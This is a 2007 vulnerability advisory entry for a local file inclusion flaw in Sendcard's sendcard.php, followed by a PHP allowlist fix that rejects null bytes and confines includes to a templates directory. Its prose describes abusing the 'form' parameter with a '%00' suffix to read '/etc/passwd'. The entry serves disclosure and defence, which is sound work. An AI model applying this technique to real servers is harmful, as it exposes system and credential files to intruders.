vendor:
by: ettee
CVSS: 5.5 (MEDIUM)
CWE: Local File Inclusion
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Sendcard Local File Inclusion Vulnerability
The sendcard.php script is vulnerable to local file inclusion. The vulnerability allows an attacker to include arbitrary local files by manipulating the 'form' parameter in the URL. By appending '%00' to the 'form' parameter value, an attacker can bypass the input validation and include sensitive files, such as '/etc/passwd'. This can lead to unauthorized access to the server's files and potentially sensitive information.
Mitigation:
To mitigate this vulnerability, it is recommended to validate user input and properly sanitize the 'form' parameter value before including files. Additionally, access control measures should be implemented to restrict access to sensitive files.
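One way to implement the validation recommended above, shown as an added example and not Sendcard's own code: the 'form' value is looked up in a fixed allowlist, so user input never becomes part of the included path and a '%00' suffix has nothing to truncate. The template names, the `templates` directory and the function name `resolve_form_template` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the only form templates the script may include.
// Keys are the values accepted in the 'form' parameter; all names are assumptions.
const FORM_TEMPLATES = [
    'default'  => 'default_form.php',
    'birthday' => 'birthday_form.php',
];

/**
 * Map a user-supplied 'form' value to a file inside $baseDir, or return null.
 */
function resolve_form_template($form, string $baseDir): ?string
{
    // Reject arrays (?form[]=x) and anything else that is not a plain string.
    if (!is_string($form)) {
        return null;
    }
    // Reject NUL bytes explicitly: '%00' decodes to "\0", which older PHP
    // versions handed to the filesystem layer as a string terminator.
    if (strpos($form, "\0") !== false) {
        return null;
    }
    // Exact-match lookup; the user value is never concatenated into a path.
    if (!array_key_exists($form, FORM_TEMPLATES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . FORM_TEMPLATES[$form]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage in the request handler (assumed layout: templates live in ./templates).
$template = resolve_form_template($_GET['form'] ?? 'default', __DIR__ . '/templates');
if ($template === null) {
    http_response_code(400);
    exit('Unknown form');
}
require $template;
```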